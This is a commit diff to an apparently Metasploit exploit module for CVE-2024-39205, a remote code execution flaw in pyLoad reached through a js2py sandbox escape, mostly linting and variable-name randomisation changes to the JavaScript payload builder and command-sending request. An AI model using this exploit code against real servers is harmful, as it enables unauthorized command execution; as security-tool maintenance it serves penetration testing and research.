Linting and Rex::RandomIdentifier update

Author: jheysel-r7

modules/exploits/linux/http/pyload_js2py_cve_2024_39205.rb

@@ -25,7 +25,7 @@ def initialize(info = {})
           and execute arbitrary commands on the host. At the time of writing no patch has been released, version 0.74
           is the latest version of js2py which was released Nov 6, 2022.
 
-          CVE-2024-39205 is an remote code execution vulnerability in Pyload  (<=0.5.0b3.dev85) which is an open-source
+          CVE-2024-39205 is an remote code execution vulnerability in Pyload (<=0.5.0b3.dev85) which is an open-source
           download manager designed to automate file downloads from various online sources. Pyload is vulnerable because
           it exposes the vulnerable js2py functionality mentioned above on the /flash/addcrypted2 API endpoint.
           This endpoint was designed to only accept connections from localhost but by manipulating the HOST header we
@@ -113,10 +113,7 @@ def exploit
   end
 
   def javascript_payload(cmd)
-    keys = %i[command hacked bymarve n11 getattr obj findpopen result item]
-    js_vars = keys.each_with_object({}) do |key, hash|
-      hash[key] = Rex::Text.rand_text_alpha(8..16)
-    end
+    js_vars = Rex::RandomIdentifier::Generator.new({ language: :javascript })
 
     <<~EOS
       let #{js_vars[:command]} = "#{cmd}"
@@ -153,7 +150,7 @@ def javascript_payload(cmd)
   def execute_command(cmd, _opts = {})
     vprint_status("Executing command: #{cmd}")
     crypted_b64 = Rex::Text.encode_base64(rand(4))
-    
+
     res = send_request_cgi(
       'method' => 'POST',
       'headers' => {
@@ -170,6 +167,8 @@ def execute_command(cmd, _opts = {})
     return if res.nil?
     return if res.code == 500 && res.body =~ /Could not decrypt key/
 
+    print_status(javascript_payload(cmd))
+
     fail_with(Failure::UnexpectedReply, "The HTTP server replied with a status of #{res.code}")
   end